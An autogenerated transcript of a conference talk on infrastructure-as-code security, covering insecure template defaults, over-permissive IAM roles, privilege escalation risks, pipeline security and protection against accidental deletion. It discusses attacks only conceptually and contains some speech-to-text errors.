Transcript
This transcript was autogenerated. To make changes, submit a PR.
Hi everyone, thank you for joining my session.
Today I'll be talking about infrastructure as code,
security, best practices and strategies.
Before we start, let me introduce myself.
I am Joshua Arvin Latt and I am the chief technology
officer of Noworks Interactive Labs.
And I'm also an AWS machine Learning hero.
I am also the author of the books Machine Learning with Amazon Sagemaker
cookbook machine learning engineering on AWS
and building and automating penetration testing labs in
these cloud. Next year there will be a new book
and it's called Learning serverless security. So if you're into cloud
security, then this book is for you. So let's
begin. So in the past we usually think
of web applications as more or less single
components. And after a while we realize
that there are several parts to it, like the front
end aspect, the back end and
also the database. So the front end connects to the back end
and these back end connects to the database. Basically this is
still these same web application which serves
the end users. The more we use the cloud
and the more complex the system gets, the more components
it would have. So for example, if you have an architecture
like this where you have several components like a CDN,
a load balancer, as well as the servers,
then we're able to make the system more resilient,
especially if the servers can auto scale depending
on how many users are able to use the applications.
So if there are two to three times more users, then maybe we
can add more servers inside these setup. This is one
of the advantages of having a distributed setup, but of course it would
involve more resources and more components
at the same time. If you want to incorporate security
resources like firewalls, then we can easily add those
and bind it to existing components.
Thus when it comes to discussions, it may make
sense to just have architectures where you have
different building blocks. These each building block has a
purpose and multiple building blocks would be grouped together
to perform specific actions like preventing against
certain types of attacks or maybe allowing the system to scale when
there's a lot of traffic. That said,
when working with a lot of resources,
it becomes more important for
us to manage these resources in a way that allows us
to configure these in a more efficient manner.
And one of the techniques available would be the
usage of infrastructure as code tools and solutions
to convert a complex infrastructure into
templates. So when I say templates, these are basically
just text files containing the configuration
of the resources which would be created.
So there, once you have this infrastructure
as code templates, we are now able to build
multiple environments from that template.
So for example, if we have a staging environment and a
production environment, both of those environments can
come from the same template, and of course they would
be configured a bit differently with the right configuration
parameters. So more or less you have a template,
a text file, and then you would have various
configuration parameters depending on where you're going to
deploy the resources. So if it's a staging environment,
then there would be a staging configuration, and then if there's the
production environment, then you would have of course the corresponding
production configuration with of course these larger resources
deployed in a production setting. So one
of the best practices when building environments,
especially in the cloud, using IAC tools,
for example terraform, one of these best practices
would be to create separate IAM rules
or basically securing configuration and bind
those to cloud resources. So at
the moment you'll probably be asking why.
That's because each of the resources number one needs to
be tagged properly, and each of the resources should be
properly configured as well. So after tagging
those resources one at a time, so you're able
to properly manage the assets, you're properly
able to count and identify which resources have been created
and which ones are missing and which ones need to be modified,
and then which resources need a specific set
of permissions. And there you're able to identify
which could be a weak link when it comes to security.
So when building infrastructure resources
using IAC tools, it's important to avoid insecure defaults
and of course regularly check for announcements in cloud platforms.
The tricky part with using infrastructure as code is
the templates and examples available online may already be
outdated. And these are some cases where the current
configuration specified in those default templates may
end up being insecure, meaning they may have security vulnerabilities.
In some cases, when you use generative AI tools
to generate these types of templates, you might end
up producing something which is already
insecure, something which has vulnerabilities.
A good example of this would be an s three bucket created
using IAC. But if you accidentally opened
that bucket for access to anyone in the world,
then anything you store inside that storage container could easily
be accessed and downloaded by everyone else. So if
that storage contains,
let's say a database dump or let's say
a set of files containing very sensitive information, then it's
going CTO affect your organization as well. So be
very careful about this and regularly check for announcements in
cloud platforms, especially if they decided to change
the defaults into something more secure.
So this is important, especially if you use cloud
platforms like AWS, Azure and GCP.
Because even if you already have the IAC templates,
then those templates may not automatically reflect
what has been announced recently. Now let's talk
about secret management and permission management. So when
running IAC tools, IAC tools of
course require credentials,
something like a secret key or an access key to
allow them to create resources inside these cloud platform.
So the challenge there is what if you decided to
launch a server in a public
subnet and inside that server you're going to run
the IAC templates. When I say run, you basically
have the IAC templates ready there and you use these
command line. CTO basically convert those templates
into actual resources. In most cases,
developers and engineers would do the shortcut where
the server would have an IM role
with super admin permissions. Of course that would
allow you to run anything and build anything
from that server. Thus it's super convenient for the
engineers. CTO have this type of setup. Unfortunately, the problem
there is that server is tagged
as high risk because for one thing it's in the public subnet.
If that gets compromised, then anyone
who has access to that server would technically be able to
perform anything in that cloud environment.
So right now you might be asking me why or how?
Because even if I'm just talking about the concepts,
most of us have no idea how these attacks are actually
performed. So getting
back to the example earlier, let's say that
you have a server, these, your IAC code is converted
into infrastructure and that server has super admin permissions.
If that server gets compromised, what could possibly happen
next? There are a lot of things that can happen.
In some cases, if a team decides to use, let's say
containers to do things, or maybe have
different IAM resources configured,
then any of these things could happen.
Maybe container escape is possible, especially if
you decided CTO utilize containers to run
IAC code inside it. So a lot of people think
that using containers would be a
silver bullet. Unfortunately, if you accidentally run containers
with excessive permissions, it's also possible to perform container
escape. That is, someone inside the container
can access the server where these container is running.
The next step there is once an attacker is inside
a server, IAM privilege escalation is possible,
meaning that someone with very
little permissions could technically find a
way to access the entire account using
the right set of steps. When I say the right set of steps, maybe other
IAM resources could be created and those could then
be used to get extra access,
which would allow an attacker to perform malicious actions
or operations that would include attacking other
organizations. That would include deleting all the resources in
your account and also creating superbic resources
which would end up closing the account. Also in other
cases there could be databases or data stores which
contain sensitive information, and the extra access acquired
during privilege escalation can be used to access the
other databases and data stores. The next best
practice would be to track and manage changes using version control tools.
So the advantage when having IAC
solutions as part of the process is that you
have your infrastructure as code, and when you have
the resources as code, you're able to
keep them as files and use something like git to
manage the changes. So if you have version one, version two,
and version three, then you can easily check and
iterate using a very similar process as what is
followed when developing web applications,
for example. So if you have a first version and then you have a new
version, instead of deploying that new version in
a production environment, you can technically best it out
first in a test or staging environment, and then
when your application is unaffected, then you
can now get it deployed in a production environment.
So again, resources are now converted into
code. So everything you can do with code, you can now implement
it in your IAC process.
So here we can see an analogy where
you have here a picture of evolution.
You start with previous versions and then you'll
end up having more modern versions, which would probably
take a lot of iterations. And when you're
able to start this process, well then
you can easily find multiple variations. You can have
another version which makes use of previous
code bases. And again you can reuse templates,
you can lay your templates and you can make them as fine
grained as possible using the right set of techniques.
So again, I'm just re emphasizing the point that
this is a very powerful technique in order to manage
IAC code, especially if you have
insecure defaults at the start. And then you realize you
have to update the subnet configuration in your IAC code and
convert it into something more, securing so that the next time around
attackers won't be able to attack certain resources
now protected with the right configuration.
In addition to that, the moment you convert your infrastructure
as code, we can now use pipelines to analyze security
vulnerabilities automatically. So there are different ways to
analyze the code and the resources created
from the code, and you basically have these pipelines. So in
step one you have the code, you push it and the pipeline gets activated.
However, it's important that we're very careful when
managing resources inside pipelines, because even
if we're able to detect these security vulnerabilities inside these templates.
It's possible to have something like a Poisson pipeline
execution, especially when you're utilizing cloud resources
to run and convert these templates into actual
resources. For one thing, again, resources in
the cloud would probably have IAC roles attached
to these. So when running resources and
running templates inside these resources,
there's going to be an IAC role which is checked first
before specific actions can be performed. So if that
IAC rule has super admin permissions, then the problem
there is if there's a script or
a payload injected included in the template
when the template runs, and then when that specific
set of scripts get executed, then it
could be possible for something malicious to be executed
inside the pipeline environment itself. So very
scary because a lot of teams prioritize the
production systems and basically the web applications
and the resources there.
When it comes to securing production environments,
however, the weak link could be any
existing pipelines which are used by the development
teams. So again, make sure that everything deployed
in your environment is properly secured.
Next, it's important to protect specific resources from accidental
deletion or modification. So a lot of us
just think of IAC as a simple process where
we write code and then resources are created.
However, IAC involves modification and deletion as well.
So what if you created databases using
IAC code? So here,
what if suddenly somebody deletes
the resources using an IAC solution?
Then your production databases could be deleted automatically
as well. So make sure you know the proper configuration
parameters to ensure that certain resources in
your infrastructure are not modified or deleted by
default when using IAC solutions. So that's
pretty much it. Today we learned a
lot of things and we're able to learn how
to secure resources and systems built
using IAC tools. Thank you so much and
have a great day ahead.